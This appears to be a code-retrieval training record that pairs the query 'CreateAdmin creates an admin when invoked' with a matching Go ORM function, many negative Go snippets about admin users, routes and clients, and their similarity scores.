IAM\n\t\tadminRouter.Methods(http.MethodPut).Path(adminAPIVersionPrefix+\"/add-user\").HandlerFunc(httpTraceHdrs(adminAPI.AddUser)).Queries(\"accessKey\", \"{accessKey:.*}\")\n\t\tadminRouter.Methods(http.MethodPut).Path(adminAPIVersionPrefix+\"/set-user-status\").HandlerFunc(httpTraceHdrs(adminAPI.SetUserStatus)).\n\t\t\tQueries(\"accessKey\", \"{accessKey:.*}\").Queries(\"status\", \"{status:.*}\")\n\n\t\t// Info policy IAM\n\t\tadminRouter.Methods(http.MethodGet).Path(adminAPIVersionPrefix+\"/info-canned-policy\").HandlerFunc(httpTraceHdrs(adminAPI.InfoCannedPolicy)).Queries(\"name\", \"{name:.*}\")\n\n\t\t// Remove policy IAM\n\t\tadminRouter.Methods(http.MethodDelete).Path(adminAPIVersionPrefix+\"/remove-canned-policy\").HandlerFunc(httpTraceHdrs(adminAPI.RemoveCannedPolicy)).Queries(\"name\", \"{name:.*}\")\n\n\t\t// Set user or group policy\n\t\tadminRouter.Methods(http.MethodPut).Path(adminAPIVersionPrefix+\"/set-user-or-group-policy\").\n\t\t\tHandlerFunc(httpTraceHdrs(adminAPI.SetPolicyForUserOrGroup)).\n\t\t\tQueries(\"policyName\", \"{policyName:.*}\", \"userOrGroup\", \"{userOrGroup:.*}\", \"isGroup\", \"{isGroup:true|false}\")\n\n\t\t// Remove user IAM\n\t\tadminRouter.Methods(http.MethodDelete).Path(adminAPIVersionPrefix+\"/remove-user\").HandlerFunc(httpTraceHdrs(adminAPI.RemoveUser)).Queries(\"accessKey\", \"{accessKey:.*}\")\n\n\t\t// List users\n\t\tadminRouter.Methods(http.MethodGet).Path(adminAPIVersionPrefix + \"/list-users\").HandlerFunc(httpTraceHdrs(adminAPI.ListUsers))\n\n\t\t// User info\n\t\tadminRouter.Methods(http.MethodGet).Path(adminAPIVersionPrefix+\"/user-info\").HandlerFunc(httpTraceHdrs(adminAPI.GetUserInfo)).Queries(\"accessKey\", \"{accessKey:.*}\")\n\n\t\t// Add/Remove members from group\n\t\tadminRouter.Methods(http.MethodPut).Path(adminAPIVersionPrefix + \"/update-group-members\").HandlerFunc(httpTraceHdrs(adminAPI.UpdateGroupMembers))\n\n\t\t// Get Group\n\t\tadminRouter.Methods(http.MethodGet).Path(adminAPIVersionPrefix+\"/group\").HandlerFunc(httpTraceHdrs(adminAPI.GetGroup)).Queries(\"group\", \"{group:.*}\")\n\n\t\t// List Groups\n\t\tadminRouter.Methods(http.MethodGet).Path(adminAPIVersionPrefix + \"/groups\").HandlerFunc(httpTraceHdrs(adminAPI.ListGroups))\n\n\t\t// Set Group Status\n\t\tadminRouter.Methods(http.MethodPut).Path(adminAPIVersionPrefix+\"/set-group-status\").HandlerFunc(httpTraceHdrs(adminAPI.SetGroupStatus)).Queries(\"group\", \"{group:.*}\").Queries(\"status\", \"{status:.*}\")\n\n\t\t// List policies\n\t\tadminRouter.Methods(http.MethodGet).Path(adminAPIVersionPrefix + \"/list-canned-policies\").HandlerFunc(httpTraceHdrs(adminAPI.ListCannedPolicies))\n\t}\n\n\t// -- Top APIs --\n\t// Top locks\n\tif globalIsDistXL {\n\t\tadminRouter.Methods(http.MethodGet).Path(adminAPIVersionPrefix + \"/top/locks\").HandlerFunc(httpTraceHdrs(adminAPI.TopLocksHandler))\n\t}\n\n\t// HTTP Trace\n\tadminRouter.Methods(http.MethodGet).Path(adminAPIVersionPrefix + \"/trace\").HandlerFunc(adminAPI.TraceHandler)\n\n\t// Console Logs\n\tadminRouter.Methods(http.MethodGet).Path(adminAPIVersionPrefix + \"/log\").HandlerFunc(httpTraceAll(adminAPI.ConsoleLogHandler))\n\n\t// -- KMS APIs --\n\t//\n\tadminRouter.Methods(http.MethodGet).Path(adminAPIVersionPrefix + \"/kms/key/status\").HandlerFunc(httpTraceAll(adminAPI.KMSKeyStatusHandler))\n\n\t// If none of the routes match add default error handler routes\n\tadminRouter.NotFoundHandler = http.HandlerFunc(httpTraceAll(errorResponseHandler))\n\tadminRouter.MethodNotAllowedHandler = http.HandlerFunc(httpTraceAll(errorResponseHandler))\n}", "func NewAdminAPI(\n\tctx context.Context,\n\tcl client.Client,\n\tscheme *runtime.Scheme,\n\tcluster *vectorizedv1alpha1.Cluster,\n\tclusterDomain string,\n\tadminAPI adminutils.AdminAPIClientFactory,\n\tlog logr.Logger,\n) (adminutils.AdminAPIClient, error) {\n\theadlessSvc := resources.NewHeadlessService(cl, cluster, scheme, nil, log)\n\tclusterSvc := resources.NewClusterService(cl, cluster, scheme, nil, log)\n\tpki, err := certmanager.NewPki(\n\t\tctx,\n\t\tcl,\n\t\tcluster,\n\t\theadlessSvc.HeadlessServiceFQDN(clusterDomain),\n\t\tclusterSvc.ServiceFQDN(clusterDomain),\n\t\tscheme,\n\t\tlog,\n\t)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"creating PKI: %w\", err)\n\t}\n\tadminTLSConfigProvider := pki.AdminAPIConfigProvider()\n\tadminAPIClient, err := adminAPI(\n\t\tctx,\n\t\tcl,\n\t\tcluster,\n\t\theadlessSvc.HeadlessServiceFQDN(clusterDomain),\n\t\tadminTLSConfigProvider,\n\t)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"creating AdminAPIClient: %w\", err)\n\t}\n\treturn adminAPIClient, nil\n}", "func (_CrToken *CrTokenFilterer) WatchNewAdmin(opts *bind.WatchOpts, sink chan<- *CrTokenNewAdmin) (event.Subscription, error) {\n\n\tlogs, sub, err := _CrToken.contract.WatchLogs(opts, \"NewAdmin\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn event.NewSubscription(func(quit <-chan struct{}) error {\n\t\tdefer sub.Unsubscribe()\n\t\tfor {\n\t\t\tselect {\n\t\t\tcase log := <-logs:\n\t\t\t\t// New log arrived, parse the event and forward to the user\n\t\t\t\tevent := new(CrTokenNewAdmin)\n\t\t\t\tif err := _CrToken.contract.UnpackLog(event, \"NewAdmin\", log); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tevent.Raw = log\n\n\t\t\t\tselect {\n\t\t\t\tcase sink <- event:\n\t\t\t\tcase err := <-sub.Err():\n\t\t\t\t\treturn err\n\t\t\t\tcase <-quit:\n\t\t\t\t\treturn nil\n\t\t\t\t}\n\t\t\tcase err := <-sub.Err():\n\t\t\t\treturn err\n\t\t\tcase <-quit:\n\t\t\t\treturn nil\n\t\t\t}\n\t\t}\n\t}), nil\n}", "func newJeeekUserCollectionViewAdmin(res JeeekUserCollection) userviews.JeeekUserCollectionView {\n\tvres := make(userviews.JeeekUserCollectionView, len(res))\n\tfor i, n := range res {\n\t\tvres[i] = newJeeekUserViewAdmin(n)\n\t}\n\treturn vres\n}", "func NewAdminHandler(handler http.Handler, s *InMemoryState) http.Handler {\n\treturn &AdminHandler{subHandler: handler, state: s}\n}", "func AdminStoppg(w rest.ResponseWriter, r *rest.Request) {\n\tdbConn, err := util.GetConnection(CLUSTERADMIN_DB)\n\tif err != nil {\n\t\tlogit.Error.Println(err.Error())\n\t\trest.Error(w, err.Error(), 400)\n\t\treturn\n\n\t}\n\tdefer dbConn.Close()\n\n\terr = secimpl.Authorize(dbConn, r.PathParam(\"Token\"), \"perm-cluster\")\n\tif err != nil {\n\t\tlogit.Error.Println(err.Error())\n\t\trest.Error(w, err.Error(), http.StatusUnauthorized)\n\t\treturn\n\t}\n\n\t//logit.Info.Println(\"AdminStoppg:called\")\n\tID := r.PathParam(\"ID\")\n\tif ID == \"\" {\n\t\tlogit.Error.Println(\"AdminStoppg:ID not found error\")\n\t\trest.Error(w, \"node ID required\", http.StatusBadRequest)\n\t\treturn\n\t}\n\n\tvar dbNode types.Container\n\tdbNode, err = admindb.GetContainer(dbConn, ID)\n\tif err != nil {\n\t\tlogit.Error.Println(err.Error())\n\t\trest.Error(w, err.Error(), http.StatusBadRequest)\n\t\treturn\n\t}\n\t//logit.Info.Println(\"AdminStoppg: in stop with dbnode\")\n\n\tif dbNode.Role == \"pgpool\" {\n\t\tvar stoppoolResp cpmcontainerapi.StopPgpoolResponse\n\t\tstoppoolResp, err = cpmcontainerapi.StopPgpoolClient(dbNode.Name)\n\t\tlogit.Info.Println(\"AdminStoppg:\" + stoppoolResp.Output)\n\t} else {\n\t\tvar stoppgResp cpmcontainerapi.StopPGResponse\n\t\tstoppgResp, err = cpmcontainerapi.StopPGClient(dbNode.Name)\n\t\tlogit.Info.Println(\"AdminStoppg:\" + stoppgResp.Output)\n\t}\n\tif err != nil {\n\t\tlogit.Error.Println(err.Error())\n\t\trest.Error(w, err.Error(), http.StatusBadRequest)\n\t\treturn\n\t}\n\n\tw.WriteHeader(http.StatusOK)\n\tstatus := types.SimpleStatus{}\n\tstatus.Status = \"OK\"\n\tw.WriteJson(&status)\n}", "func NewAdminClient(c config) *AdminClient {\n\treturn &AdminClient{config: c}\n}", "func (ac *AdminCtl) Create() {\n\tif ac.Ctx.Request().Method == \"POST\" {\n\t\tnumber, _ := strconv.Atoi(ac.Ctx.Request().FormValue(\"number\"))\n\t\tname := ac.Ctx.Request().FormValue(\"name\")\n\t\tmtype := ac.Ctx.Request().FormValue(\"type\")\n\t\tcount, _ := strconv.Atoi(strings.Trim(ac.Ctx.Request().FormValue(\"count\"), \" \")) // 去除空白字符\n\t\tprice, _ := strconv.Atoi(ac.Ctx.Request().FormValue(\"price\"))\n\t\thref := ac.Ctx.Request().FormValue(\"href\")\n\t\turl := ac.Ctx.Request().FormValue(\"url\")\n\t\tsnumber := ac.Ctx.Request().FormValue(\"number\")\n\n\t\tproduct := &models.Product{\n\t\t\tNumber: number,\n\t\t\tName: name,\n\t\t\tType: mtype,\n\t\t\tCount: count,\n\t\t\tPrice: price,\n\t\t\tHref: href,\n\t\t\tURL: url,\n\t\t\tBrief: \"/data/\" + snumber + \"/brief\",\n\t\t\tDetail: \"/data/\" + snumber + \"/detail\",\n\t\t}\n\t\tac.Ctx.DB.Create(&product)\n\t\tac.Ctx.Redirect(\"/admin\", http.StatusFound)\n\t} else {\n\t\tac.Ctx.Data[\"AddPage\"] = true\n\t\tac.Ctx.Template = \"admin-add\"\n\t\tac.HTML(http.StatusOK)\n\t}\n}", "func newLocalService(config fab.EndpointConfig, mspID string, opts ...coptions.Opt) *LocalService {\n\tlogger.Debug(\"Creating new local discovery service\")\n\n\ts := &LocalService{mspID: mspID}\n\ts.service = newService(config, s.queryPeers, opts...)\n\treturn s\n}", "func newM3adminClient() m3admin.Client {\n\tretry := retryhttp.NewClient()\n\tretry.RetryMax = 0\n\n\treturn m3admin.NewClient(m3admin.WithHTTPClient(retry))\n}", "func NewServerAdmin() *ServerAdmin {\n\tsa := new(ServerAdmin)\n\tsa.logger = log4g.GetLogger(\"rpc.admin\")\n\treturn sa\n}", "func (_Cakevault *CakevaultCallerSession) Admin() (common.Address, error) {\n\treturn _Cakevault.Contract.Admin(&_Cakevault.CallOpts)\n}", "func (suite *StoreTestSuite) Test002_Admin() {\n\t// Create admin\n\terr := suite.store.AdminExistsOrCreate(\"test_secret\")\n\tsuite.Nil(err)\n\n\t// Fetch admin\n\tu, err := suite.store.GetUserByCreds(\"boss\", \"test_secret\")\n\tsuite.Nil(err)\n\tsuite.Equal(schema.RoleAdmin, u.Role)\n}", "func (d *Dao) AdminBind(c context.Context, mid, aid int64, tags, regionName, ip string) (err error) {\n\tparams := url.Values{}\n\tparams.Set(\"mid\", strconv.FormatInt(mid, 10))\n\tparams.Set(\"aid\", strconv.FormatInt(aid, 10))\n\tparams.Set(\"tnames\", tags)\n\tparams.Set(\"region_name\", regionName)\n\tvar res struct {\n\t\tCode int `json:\"code\"`\n\t}\n\n\tif err = d.client.Post(c, d.adminBindURL, ip, params, &res); err != nil {\n\t\tlog.Error(\"AdminBind d.client.Post(%s) error(%v)\", d.adminBindURL+\"?\"+params.Encode(), err)\n\t\treturn\n\t}\n\tlog.Info(\"AdminBind url(%s) code(%d)\", d.adminBindURL+\"?\"+params.Encode(), res.Code)\n\tif res.Code != 0 {\n\t\tlog.Error(\"AdminBind url(%s) code(%d)\", d.adminBindURL+\"?\"+params.Encode(), res.Code)\n\t\terr = fmt.Errorf(\"AdminBind response code(%d)!=0\", res.Code)\n\t}\n\treturn\n}", "func (c *AdminClient) Create() *AdminCreate {\n\tmutation := newAdminMutation(c.config, OpCreate)\n\treturn &AdminCreate{config: c.config, hooks: c.Hooks(), mutation: mutation}\n}", "func (v AdminsResource) Create(c buffalo.Context) error {\n\t// Allocate an empty Admin\n\tadmin := &models.Admin{}\n\n\t// Bind admin to the html form elements\n\tif err := c.Bind(admin); err != nil {\n\t\treturn errors.WithStack(err)\n\t}\n\n\t// Get the DB connection from the context\n\ttx, ok := c.Value(\"tx\").(*pop.Connection)\n\tif !ok {\n\t\treturn errors.WithStack(errors.New(\"no transaction found\"))\n\t}\n\n\th, err := generatePasswordHash(admin.Password)\n\tif err != nil {\n\t\treturn err\n\t}\n\tadmin.Password = h\n\t// Validate the data from the html form\n\tverrs, err := tx.ValidateAndCreate(admin)\n\tif err != nil {\n\t\treturn errors.WithStack(err)\n\t}\n\n\tif verrs.HasAny() {\n\t\t// Make the errors available inside the response\n\t\tc.Set(\"errors\", verrs)\n\n\t\treturn c.Render(422, r.JSON(admin))\n\t}\n\n\treturn c.Render(201, r.JSON(admin))\n}", "func NewMockAdmin(ctrl *gomock.Controller) *MockAdmin {\n\tmock := &MockAdmin{ctrl: ctrl}\n\tmock.recorder = &MockAdminMockRecorder{mock}\n\treturn mock\n}" ]
[ "0.601416", "0.5912472", "0.5892514", "0.5892514", "0.58049214", "0.57417405", "0.55431175", "0.5536728", "0.5487055", "0.5487055", "0.5436273", "0.54248977", "0.5418589", "0.54026824", "0.5401932", "0.5398852", "0.53280324", "0.5287013", "0.5269052", "0.5264321", "0.51771843", "0.5169852", "0.5132339", "0.51284486", "0.5120102", "0.5111311", "0.5109339", "0.50858176", "0.50830966", "0.5070129", "0.5050683", "0.5047391", "0.5036417", "0.5026066", "0.5024078", "0.5012329", "0.49935263", "0.49902594", "0.49896508", "0.4982192", "0.4982192", "0.4981924", "0.4961106", "0.49537832", "0.4943683", "0.4926435", "0.48864043", "0.48727542", "0.48491", "0.48465526", "0.48352754", "0.48340282", "0.48159218", "0.48156315", "0.4794206", "0.47925702", "0.47918656", "0.47896025", "0.4785236", "0.47840473", "0.47747374", "0.4765913", "0.4764927", "0.47536743", "0.47527918", "0.47459838", "0.47229636", "0.47215843", "0.472073", "0.4719832", "0.47063673", "0.46945092", "0.4691751", "0.468922", "0.46824107", "0.4676783", "0.46742812", "0.46709704", "0.46675894", "0.4667317", "0.4666173", "0.46635184", "0.46595857", "0.46593586", "0.4658365", "0.46523887", "0.46504804", "0.46476516", "0.464483", "0.46422336", "0.46401566", "0.46380714", "0.46259558", "0.4610379", "0.460989", "0.4609377", "0.46065226", "0.45981804", "0.4595523", "0.45791242" ]
0.6929925
0
CreateAdmin creates an admin when invoked
func (orm *ORM) CreateAdmin(ctx context.Context, name string, email string, password string, role string, createdBy *string, phone *string) (*models.Admin, error) { _Admin := models.Admin{ FullName: name, Email: email, Password: password, Phone: phone, Role: role, CreatedByID: createdBy, } _Result := orm.DB.DB.Select("FullName", "Email", "Password", "Phone", "Role", "CreatedByID").Create(&_Admin) if _Result.Error != nil { return nil, _Result.Error } return &_Admin, nil }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func CreateAdmin(w http.ResponseWriter, r *http.Request) {\n\tvar body CreateAdminRequest\n\tif err := read.JSON(r.Body, &body); err != nil {\n\t\trender.Error(w, admin.WrapError(admin.ErrorBadRequestType, err, \"error reading request body\"))\n\t\treturn\n\t}\n\n\tif err := body.Validate(); err != nil {\n\t\trender.Error(w, err)\n\t\treturn\n\t}\n\n\tauth := mustAuthority(r.Context())\n\tp, err := auth.LoadProvisionerByName(body.Provisioner)\n\tif err != nil {\n\t\trender.Error(w, admin.WrapErrorISE(err, \"error loading provisioner %s\", body.Provisioner))\n\t\treturn\n\t}\n\tadm := &linkedca.Admin{\n\t\tProvisionerId: p.GetID(),\n\t\tSubject: body.Subject,\n\t\tType: body.Type,\n\t}\n\t// Store to authority collection.\n\tif err := auth.StoreAdmin(r.Context(), adm, p); err != nil {\n\t\trender.Error(w, admin.WrapErrorISE(err, \"error storing admin\"))\n\t\treturn\n\t}\n\n\trender.ProtoJSONStatus(w, adm, http.StatusCreated)\n}", "func AdminCreate(w http.ResponseWriter, data interface{}) {\n\trender(tpAdminCreate, w, data)\n}", "func AdminCreate(w http.ResponseWriter, data interface{}) {\n\trender(tpAdminCreate, w, data)\n}", "func (ct *customer) CreateAdmin(c echo.Context) error {\n\tpanic(\"implement me later on\")\n}", "func CreateAdmin(a AdminRegForm) (*mongo.InsertOneResult, error) {\n\tnewAdmin := Admin{\n\t\tID: primitive.NewObjectID(),\n\t\tFrasUsername: a.FrasUsername,\n\t\tPassword: a.Password,\n\t\tInstID: a.InstID,\n\t\tModifiedAt: time.Now(),\n\t}\n\treturn adminCollection.InsertOne(context.TODO(), newAdmin)\n}", "func (admin *Admin) CreateAdmin(db *gorm.DB) (*Admin, error) {\n\n\terr := db.Debug().Create(&admin).Error\n\tif err != nil {\n\t\treturn &Admin{}, err\n\t}\n\n\treturn admin, nil\n}", "func (s *rpcServer) CreateAdmin(ctx context.Context, req *api.CreateAdminRequest) (*api.CreateAdminResponse, error) {\n\tlogger := log.GetLogger(ctx)\n\ta, _ := admin.ByEmail(req.Email)\n\tif a != nil {\n\t\treturn nil, fmt.Errorf(\"email %s already exists\", req.Email)\n\t}\n\ta = admin.New(req.Name, req.Email, req.PasswordPlainText)\n\tif err := a.Register(); err != nil {\n\t\tlogger.Errorf(\"error while registering admin: %v\", err)\n\t\treturn nil, err\n\t}\n\tlogger.Debugf(\"%+v\", a)\n\treturn &api.CreateAdminResponse{\n\t\tAdmin: &api.Admin{\n\t\t\tId: a.ID,\n\t\t\tName: a.Name,\n\t\t\tEmail: a.Email,\n\t\t\tACL: a.ACL,\n\t\t},\n\t}, nil\n}", "func (adminrepo *AdminRepo) CreateAdmin(admin *entity.Admin) (*entity.Admin, error) {\n\tinsertOneResult, era := adminrepo.DB.Collection(entity.ADMIN).InsertOne(context.TODO(), admin)\n\tif era != nil {\n\t\treturn admin, era\n\t}\n\tresult := Helper.ObjectIDFromInsertResult(insertOneResult)\n\tif result != \"\" {\n\t\tadmin.ID = result\n\t}\n\treturn admin, nil\n}", "func (c *AdminClient) Create() *AdminCreate {\n\tmutation := newAdminMutation(c.config, OpCreate)\n\treturn &AdminCreate{config: c.config, hooks: c.Hooks(), mutation: mutation}\n}", "func New(db *gorm.DB, prefix, cookiesecret string) *Admin {\n\tadminpath := filepath.Join(prefix, \"/admin\")\n\ta := Admin{\n\t\tdb: db,\n\t\tprefix: prefix,\n\t\tadminpath: adminpath,\n\t\tauth: auth{\n\t\t\tdb: db,\n\t\t\tpaths: pathConfig{\n\t\t\t\tadmin: adminpath,\n\t\t\t\tlogin: filepath.Join(prefix, \"/login\"),\n\t\t\t\tlogout: filepath.Join(prefix, \"/logout\"),\n\t\t\t},\n\t\t\tsession: sessionConfig{\n\t\t\t\tkey: \"userid\",\n\t\t\t\tname: \"admsession\",\n\t\t\t\tstore: cookie.NewStore([]byte(cookiesecret)),\n\t\t\t},\n\t\t},\n\t}\n\ta.adm = admin.New(&admin.AdminConfig{\n\t\tSiteName: \"My Admin Interface\",\n\t\tDB: db,\n\t\tAuth: a.auth,\n\t\tAssetFS: bindatafs.AssetFS.NameSpace(\"admin\"),\n\t})\n\taddUser(a.adm)\n\tresources.AddProduct(a.adm)\n\treturn &a\n}", "func (a *Admin) Create(c *gin.Context) {\n\n\tflash := helper.GetFlash(c)\n\n\tc.HTML(http.StatusOK, \"admin/create\", gin.H{\n\t\t\"title\": \"创建管理员\",\n\t\t\"flash\": flash,\n\t})\n}", "func (h *Handler) CreateAdminHandler(w http.ResponseWriter, r *http.Request) {\n\tvar u user.User\n\n\terr := json.NewDecoder(r.Body).Decode(&u)\n\tif err != nil {\n\t\th.log.Error(err)\n\t\t_ = response.HTTPError(w, http.StatusBadRequest, response.ErrorParsingUser.Error())\n\t\treturn\n\t}\n\n\tu.Role = user.Admin\n\n\tctx, cancel := context.WithCancel(r.Context())\n\tdefer cancel()\n\n\tselect {\n\tcase <-ctx.Done():\n\t\t_ = response.HTTPError(w, http.StatusBadGateway, response.ErrTimeout.Error())\n\t\treturn\n\tdefault:\n\t\terr = h.service.Create(ctx, &u)\n\t}\n\n\tif err != nil {\n\t\th.log.Error(err)\n\t\t_ = response.HTTPError(w, http.StatusBadRequest, err.Error())\n\t\treturn\n\t}\n\n\tw.Header().Add(\"Location\", r.URL.String()+u.ID.Hex())\n\t_ = response.JSON(w, http.StatusCreated, response.Map{\"user\": u})\n}", "func (v AdminsResource) Create(c buffalo.Context) error {\n\t// Allocate an empty Admin\n\tadmin := &models.Admin{}\n\n\t// Bind admin to the html form elements\n\tif err := c.Bind(admin); err != nil {\n\t\treturn errors.WithStack(err)\n\t}\n\n\t// Get the DB connection from the context\n\ttx, ok := c.Value(\"tx\").(*pop.Connection)\n\tif !ok {\n\t\treturn errors.WithStack(errors.New(\"no transaction found\"))\n\t}\n\n\th, err := generatePasswordHash(admin.Password)\n\tif err != nil {\n\t\treturn err\n\t}\n\tadmin.Password = h\n\t// Validate the data from the html form\n\tverrs, err := tx.ValidateAndCreate(admin)\n\tif err != nil {\n\t\treturn errors.WithStack(err)\n\t}\n\n\tif verrs.HasAny() {\n\t\t// Make the errors available inside the response\n\t\tc.Set(\"errors\", verrs)\n\n\t\treturn c.Render(422, r.JSON(admin))\n\t}\n\n\treturn c.Render(201, r.JSON(admin))\n}", "func (p *plugin) CreateAdminDB(cfg *config.NoSQL, logger log.Logger) (nosqlplugin.AdminDB, error) {\n\treturn p.doCreateDB(cfg, logger)\n}", "func (d *plugin) CreateAdminDB(cfg *config.SQL) (sqlplugin.AdminDB, error) {\n\tconn, err := d.createDBConnection(cfg)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdb := newDB(conn, nil)\n\treturn db, nil\n}", "func (m *MockActivityHandler) AdminCreate(w http.ResponseWriter, r *http.Request) {\n\tm.ctrl.T.Helper()\n\tm.ctrl.Call(m, \"AdminCreate\", w, r)\n}", "func CreateAdminUser(c *gin.Context) {\n\tvar user models.AdminUser\n\tif err := c.Bind(&user); err != nil {\n\t\tc.JSON(http.StatusBadRequest, gin.H{\n\t\t\t\"message\": \"Invalid Request\",\n\t\t})\n\t\treturn\n\t}\n\n\tif err := db.Get().Create(&user).Error; err != nil {\n\t\tc.JSON(http.StatusInternalServerError, gin.H{\n\t\t\t\"message\": \"Internal Server Error\",\n\t\t})\n\t\treturn\n\t}\n\n\tc.JSON(http.StatusOK, gin.H{\n\t\t\"message\": \"Success\",\n\t})\n}", "func (a *Admin) Create() (*mongo.InsertOneResult, error) {\n\ta.CreatedAt = variable.DateTimeNowPtr()\n\ta.ModifiedAt = variable.DateTimeNowPtr()\n\treturn a.Collection().InsertOne(context.Background(), *a)\n}", "func (ad *Admin) Create() error {\n\tif ad.dbCollection == nil {\n\t\treturn errors.New(\"Uninitialized Object Admin\")\n\t}\n\ttz, _ := utils.GetTimeZone()\n\tad.Timestamp = time.Now().In(tz).Format(time.ANSIC)\n\treturn ad.dbCollection.Insert(ad)\n}", "func CreatePgAdminHandler(w http.ResponseWriter, r *http.Request) {\n\t// swagger:operation POST /pgadmin pgadminservice pgadmin-post\n\t/*```\n\t Create a pgAdmin instance\n\t*/\n\t// ---\n\t// produces:\n\t// - application/json\n\t// parameters:\n\t// - name: \"Create PgAdmin Request\"\n\t// in: \"body\"\n\t// schema:\n\t// \"$ref\": \"#/definitions/CreatePgAdminRequest\"\n\t// responses:\n\t// '200':\n\t// description: Output\n\t// schema:\n\t// \"$ref\": \"#/definitions/CreatePgAdminResponse\"\n\tvar ns string\n\tlog.Debug(\"pgadminservice.CreatePgAdminHandler called\")\n\tusername, err := apiserver.Authn(apiserver.CREATE_PGADMIN_PERM, w, r)\n\tif err != nil {\n\t\treturn\n\t}\n\n\tw.Header().Set(\"WWW-Authenticate\", `Basic realm=\"Restricted\"`)\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tw.WriteHeader(http.StatusOK)\n\n\tvar request msgs.CreatePgAdminRequest\n\t_ = json.NewDecoder(r.Body).Decode(&request)\n\n\tresp := msgs.CreatePgAdminResponse{}\n\n\tif request.ClientVersion != msgs.PGO_VERSION {\n\t\tresp.SetError(apiserver.VERSION_MISMATCH_ERROR)\n\t\tjson.NewEncoder(w).Encode(resp)\n\t\treturn\n\t}\n\n\tns, err = apiserver.GetNamespace(apiserver.Clientset, username, request.Namespace)\n\tif err != nil {\n\t\tresp.SetError(err.Error())\n\t\tjson.NewEncoder(w).Encode(resp)\n\t\treturn\n\t}\n\n\tresp = CreatePgAdmin(&request, ns, username)\n\tjson.NewEncoder(w).Encode(resp)\n\n}", "func (*AdminInfoService) NewAdmin(id int, pwd string, name string) *entities.AdminInfo {\n\tadmin := &entities.AdminInfo{\n\t\tAdminId: id,\n\t\tAdminPwd: pwd,\n\t\tAdminName: name,\n\t}\n\treturn admin\n}", "func NewAdminCreateNewUserResponseBodyAdmin(res *adminviews.JeeekUserView) *AdminCreateNewUserResponseBodyAdmin {\n\tbody := &AdminCreateNewUserResponseBodyAdmin{\n\t\tUserID: *res.UserID,\n\t\tUserName: *res.UserName,\n\t\tEmailAddress: *res.EmailAddress,\n\t\tPhoneNumber: *res.PhoneNumber,\n\t\tPhotoURL: *res.PhotoURL,\n\t\tEmailVerified: *res.EmailVerified,\n\t\tDisabled: res.Disabled,\n\t\tCreatedAt: res.CreatedAt,\n\t\tLastSignedinAt: res.LastSignedinAt,\n\t}\n\treturn body\n}", "func NewAdmin(opts *ServerOptions) (string, *elton.Elton) {\n\tcfg := opts.cfg\n\tadminConfig, _ := cfg.GetAdmin()\n\tif adminConfig == nil {\n\t\treturn \"\", nil\n\t}\n\tadminPath := defaultAdminPath\n\tif adminConfig.Prefix != \"\" {\n\t\tadminPath = adminConfig.Prefix\n\t}\n\n\te := elton.New()\n\n\tif adminConfig != nil {\n\t\te.Use(newAdminValidateMiddlewares(adminConfig)...)\n\t}\n\tcompressConfig := middleware.NewCompressConfig(\n\t\tnew(compress.BrCompressor),\n\t\tnew(middleware.GzipCompressor),\n\t)\n\te.Use(middleware.NewCompress(compressConfig))\n\n\te.Use(middleware.NewDefaultFresh())\n\te.Use(middleware.NewDefaultETag())\n\n\te.Use(middleware.NewDefaultError())\n\te.Use(middleware.NewDefaultResponder())\n\te.Use(middleware.NewDefaultBodyParser())\n\n\tg := elton.NewGroup(adminPath)\n\n\t// 按分类获取配置\n\tg.GET(\"/configs/{category}\", newGetConfigHandler(cfg))\n\t// 添加与更新使用相同处理\n\tg.POST(\"/configs/{category}\", newCreateOrUpdateConfigHandler(cfg))\n\t// 删除配置\n\tg.DELETE(\"/configs/{category}/{name}\", newDeleteConfigHandler(cfg))\n\n\tfiles := new(assetFiles)\n\n\tg.GET(\"/\", func(c *elton.Context) (err error) {\n\t\tfile := \"index.html\"\n\t\tbuf, err := files.Get(file)\n\t\tif err != nil {\n\t\t\treturn\n\t\t}\n\t\tc.SetContentTypeByExt(file)\n\t\tc.BodyBuffer = bytes.NewBuffer(buf)\n\t\treturn\n\t})\n\n\ticons := []string{\n\t\t\"favicon.ico\",\n\t\t\"logo.png\",\n\t}\n\thandleIcon := func(icon string) {\n\t\tg.GET(\"/\"+icon, func(c *elton.Context) (err error) {\n\t\t\tbuf, err := application.DefaultAsset().Find(icon)\n\t\t\tif err != nil {\n\t\t\t\treturn\n\t\t\t}\n\t\t\tc.SetContentTypeByExt(icon)\n\t\t\tc.Body = buf\n\t\t\treturn\n\t\t})\n\t}\n\tfor _, icon := range icons {\n\t\thandleIcon(icon)\n\t}\n\n\tg.GET(\"/static/*\", middleware.NewStaticServe(files, middleware.StaticServeConfig{\n\t\tPath: \"/static\",\n\t\t// 客户端缓存一年\n\t\tMaxAge: 365 * 24 * 3600,\n\t\t// 缓存服务器缓存一个小时\n\t\tSMaxAge: 60 * 60,\n\t\tDenyQueryString: true,\n\t\tDisableLastModified: true,\n\t}))\n\n\t// 获取应用状态\n\tg.GET(\"/application\", func(c *elton.Context) error {\n\t\tc.Body = application.Default()\n\t\treturn nil\n\t})\n\n\t// 获取upstream的状态\n\tg.GET(\"/upstreams\", func(c *elton.Context) error {\n\t\tc.Body = opts.upstreams.Status()\n\t\treturn nil\n\t})\n\n\t// 上传\n\tg.POST(\"/upload\", func(c *elton.Context) (err error) {\n\t\tfile, fileHeader, err := c.Request.FormFile(\"file\")\n\t\tif err != nil {\n\t\t\treturn\n\t\t}\n\t\tbuf, err := ioutil.ReadAll(file)\n\t\tif err != nil {\n\t\t\treturn\n\t\t}\n\t\tc.Body = map[string]string{\n\t\t\t\"contentType\": fileHeader.Header.Get(\"Content-Type\"),\n\t\t\t\"data\": base64.StdEncoding.EncodeToString(buf),\n\t\t}\n\t\treturn\n\t})\n\t// alarm 测试\n\tg.POST(\"/alarms/{name}/try\", func(c *elton.Context) (err error) {\n\t\tname := c.Param(\"name\")\n\t\talarms, err := cfg.GetAlarms()\n\t\tif err != nil {\n\t\t\treturn\n\t\t}\n\t\talarm := alarms.Get(name)\n\t\tif alarm == nil {\n\t\t\terr = hes.New(\"alarm is nil, please check the alarm configs\")\n\t\t\treturn\n\t\t}\n\t\terr = alarmHandle(alarm, nil)\n\t\tif err != nil 